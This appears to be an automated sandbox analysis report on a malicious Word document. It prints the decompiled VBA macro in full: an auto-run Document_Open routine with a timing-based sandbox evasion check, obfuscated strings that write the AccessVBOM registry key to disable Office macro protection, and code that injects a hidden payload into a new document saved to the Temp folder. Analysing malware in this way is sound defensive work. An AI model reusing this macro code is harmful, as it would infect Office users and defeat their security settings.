Jan 13, 2025 21:23:12.171849966 CET | 1.1.1.1 | 192.168.2.10 | 0xba6 | No error (0) | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Target ID: | 0 |
Start time: | 15:23:03 |
Start date: | 13/01/2025 |
Path: | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xcf0000 |
File size: | 1'620'872 bytes |
MD5 hash: | 1A0C2C2E7D9C4BC18E91604E9B0C7678 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument
Declaration
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | Public objApp, wsl |
APIs | Meta Information |
---|---|
Unprotect | |
Shapes | |
ActiveDocument | |
Panes | |
Delete | |
Save | |
Now | |
Now | |
TimeValue | |
DoEvents | |
Now | |
TimeValue | |
Part of subcall function verydanger@ThisDocument: CreateObject | |
Part of subcall function verydanger@ThisDocument: RegWrite | |
Part of subcall function verydanger@ThisDocument: Version | |
Part of subcall function verydanger@ThisDocument: Application | |
CreateObject | |
Visible | |
Documents | |
Variables | |
ActiveDocument | |
Add | |
Name | |
AddFromString | |
vbCrLf | |
Part of subcall function danger@ThisDocument: Item | |
ExpandEnvironmentStrings | |
Name | |
ActiveDocument | |
SaveAs2 | |
Close | |
Part of subcall function kokokokoko@ThisDocument: Open | |
Part of subcall function kokokokoko@ThisDocument: Save | |
Part of subcall function kokokokoko@ThisDocument: Close |
Strings | Decrypted Strings |
---|---|
"oikmseM#*inmowefj8349an3" | |
"00:00:15" | |
"Word.Application" | |
"Sub goods() : : End Sub" | |
"ThisDocument" | |
"%localapp""data%\T""emp" |
Line | Instruction | Meta Information |
---|---|---|
24 | Sub documeNt_opEn() | |
25 | On Error Resume Next | |
26 | ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3") | Unprotect |
27 | For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step - 1 | Shapes ActiveDocument Panes |
28 | ActiveDocument.Shapes(i).Delete | Delete |
29 | Next i | Shapes ActiveDocument Panes |
30 | ActiveDocument.Save | Save |
31 | sss = Now() | Now |
32 | While Now < sss + TimeValue("00:00:20") | Now TimeValue |
33 | DoEvents | DoEvents |
34 | Wend | Now TimeValue |
35 | If Now() - sss < TimeValue("00:00:15") Then | Now TimeValue |
35 | Exit Sub | |
35 | Endif | |
36 | verydanger | |
37 | Set objApp = CreateObject("Word.Application") | CreateObject |
38 | objApp.Visible = False | Visible |
39 | Set doc = objApp.Documents.Add | Documents |
40 | For Each vars in ActiveDocument.Variables | Variables ActiveDocument |
41 | doc.Variables.Add vars.Name & "ergegdr", vars | Add Name |
42 | i = i + 1 | |
43 | Next | Variables ActiveDocument |
44 | doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger() | AddFromString vbCrLf |
45 | tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc" | ExpandEnvironmentStrings Name ActiveDocument |
46 | doc.SaveAs2 tmp, 13 | SaveAs2 |
47 | doc.Close | Close |
48 | kokokokoko (tmp) | |
49 | End Sub |
APIs | Meta Information |
---|---|
CreateObject | |
RegWrite | |
Version | |
Application |
Strings | Decrypted Strings |
---|---|
"WSc""ript.She" | |
"HK""CU\Softw""are\Micr""osoft\Of""fice\" | |
"REG_D""WORD" |
Line | Instruction | Meta Information |
---|---|---|
18 | Sub verydanger() | |
19 | strng = "WSc" & "ript.She" | |
20 | strng = strng & "ll" | |
21 | Set wsl = CreateObject(strng) | CreateObject |
22 | wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD" | RegWrite Version Application |
23 | End Sub |
APIs | Meta Information |
---|---|
Open | |
Save | |
Close |
Line | Instruction | Meta Information |
---|---|---|
13 | Function kokokokoko(namedoc) | |
14 | Set doc2 = objApp.Documents.Open(namedoc) | Open |
15 | doc2.Save | Save |
16 | doc2.Close | Close |
17 | End Function |
APIs | Meta Information |
---|---|
Item |
Strings | Decrypted Strings |
---|---|
"s2" |
Line | Instruction | Meta Information |
---|---|---|
10 | Function danger() | |
11 | danger = ActiveDocument.Variables.Item("s2") | Item |
12 | End Function |